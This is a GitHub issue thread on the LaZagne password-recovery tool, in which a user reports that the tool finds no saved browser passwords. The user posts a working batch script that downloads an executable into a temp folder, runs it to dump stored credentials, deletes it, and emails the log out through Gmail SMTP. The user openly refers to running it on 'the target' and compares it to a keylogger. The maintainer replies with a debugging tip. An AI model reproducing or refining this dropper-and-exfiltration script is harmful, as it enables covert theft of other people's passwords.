### ISSUE TITLE
LaZagne does not detect already saved passwords. 

### ISSUE THREAD

**Issue by letsdoana** [AlessandroZ/LaZagne#437]
Hey there, it's not working for me. as you advised, I logged out of my gmail and mediafire accounts, tried clearing my browsing history (made sure I deleted all cookies, caches, saved logins etc.) then logged back in to all my accounts, pressed on save password on chrome when advised after login on all of the websites, ran the bat file and the email output is:
         **ALSO** (I noticed it is only looking for Wifi passwords? and also failing to do so. Also what is the point of this tool if the target has to clear browsing data and passwords etc. before running it? what are the chances of them deciding to clear their browsing data by themselves? I'd say pretty low.. Zlogger does the job anyways if the case is to get newly entered passwords after clearing browsing history. I checked, the tool only tries to catch wifi passwords and that is all. here is the bat script:

@echo off

set downloadURL=(direct download link)

set email=(my email)

set password=(my pass)

set exeFile=%TEMP%\proc.exe

set logFile=%TEMP%\proclog.txt

set arguments=all

powershell (new-object System.Net.WebClient).DownloadFile('%downloadURL%','%exeFile%');

%exeFile% %arguments% > %logFile%

del %exeFile%

powershell $SMTPServer = 'smtp.gmail.com';$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);$SMTPInfo.EnableSsl = $true;$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('%email%', '%password%');$ReportEmail = New-Object System.Net.Mail.MailMessage;$ReportEmail.From = '%email%';$ReportEmail.To.Add('%email%');$ReportEmail.Subject = 'Lazagne Report';$ReportEmail.Body = 'Lazagne report in the attachments.';$ReportEmail.Attachments.Add('%logFile%');$SMTPInfo.Send($ReportEmail);

del %logFile%

-------------------------------------------------------------------------------------------------------------------------

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|
 
 
########## User: Ana ##########
 
------------------- Wifi passwords -----------------
 
[-] Password not found !!!
INFO: [!] Password not found.
Authentication: WPA2PSK
Protected: true
SSID: Eod9C-RXJmYW4=
 
[-] Password not found !!!
INFO: [!] Password not found.
Authentication: WPA2PSK
Protected: true
SSID: SparkX-5.0
 
 
[+] 0 passwords have been found.
For more information launch it again with the -v option
 
elapsed time = 1.49400019646

**Comment by AlessandroZ** [comment]
To check the error, run it using the verbose mode -v. 
It could be related to this problem: https://github.com/AlessandroZ/LaZagne/issues/426
